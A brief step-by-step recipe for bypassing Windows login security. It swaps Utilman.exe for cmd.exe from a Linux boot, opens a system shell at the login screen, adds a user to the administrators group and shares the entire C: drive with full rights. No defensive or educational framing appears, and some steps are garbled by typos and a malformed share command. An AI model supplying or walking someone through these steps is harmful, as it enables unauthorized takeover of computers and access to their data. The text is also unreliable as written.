    1. Boot with Ubuntu

    2. Rename Utilman with Untilman1 and CMD with Utilman

    3. reboot with windows

    4. Click ease of access

    5.Type command in CMD


    "net localgroup administrators Username /add"
    "net share concfg*C:\/grant:Username,full"

    6. Reboot with Linux

    7. Rename Utilman with CMD and Utilman1 with Untilman

    8. Reboot with Windows & Enjoy
